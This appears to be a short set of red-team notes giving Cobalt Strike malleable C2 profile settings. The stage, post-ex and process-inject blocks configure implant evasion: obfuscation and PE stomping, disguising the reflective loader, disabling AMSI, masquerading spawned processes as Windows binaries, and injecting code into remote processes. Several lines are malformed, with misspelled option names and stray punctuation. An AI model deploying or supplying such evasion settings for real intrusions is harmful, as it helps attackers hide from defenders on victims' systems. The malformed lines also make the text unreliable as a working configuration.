Malleable Profiles
https://github.com/threatexpress/malleable-c2/blob/master/MalleableExplained.md
Options:
#size of the assembly/powershell scripts
set tasks_max_size "";
Beacons:
stage {
set compile_time "DATE OF COMPILATION";
set image_size_x64 "522090";
set image_size_x86 "522090";
set clearnup "true";
set obfucate "true";
set name "dataparse.dll";
set module_x86 "wuaueng.dll";
set module_x64 "mssrch.dll";
set stomppe "true";
transform-x86 {
strrep "ReflectiveLoader" "RunHelloWorld";
}
transform-x64 {
strrep "ReflectiveLoader" "PrintMenu";
}
}
Post-Ex:
## = random numbers
msagent_## = standard communications
status_## = staging over SMBpost-ex {
# control the temporary process we spawn to
set spawnto_x86 "`%windir%\syswow64\dllhost.exe` -k netsvcs";.
set spawnto_x64 "%windir%\\sysnative\\mstsc.exe";
# change the permissions and content of our post-ex DLLs
set obfuscate "true";
# change our post-ex output named pipe names... _
set pipename "evil_####, stuff\\not_##_ev#l";
set pipename_stager "update_##";
# pass key function pointers from Beacon to its child jobs
set smartinject "true";
# disable AMSI in powerpick, execute-assembly, and psinject
set amsi_disable "true";
}
Process-Inject:
process-inject {
# set how memory is allocated in a remove process:
set allocator "VirtualAllocEx";
# shape memory characteristics and content:
set min_alloc "16384";
set startrwx "true";
set userwx "false";
transform-x86 {
prepend "\x90\x90";
}
transform-x64 {
prepend "\x90\x90";
}
# determine how to execute the injected code
execute {
CreateThread "ntdll.dll!RtlUserThreadStart";
SetThreadContext;
RtlCreateUserThread;
}
}Last updated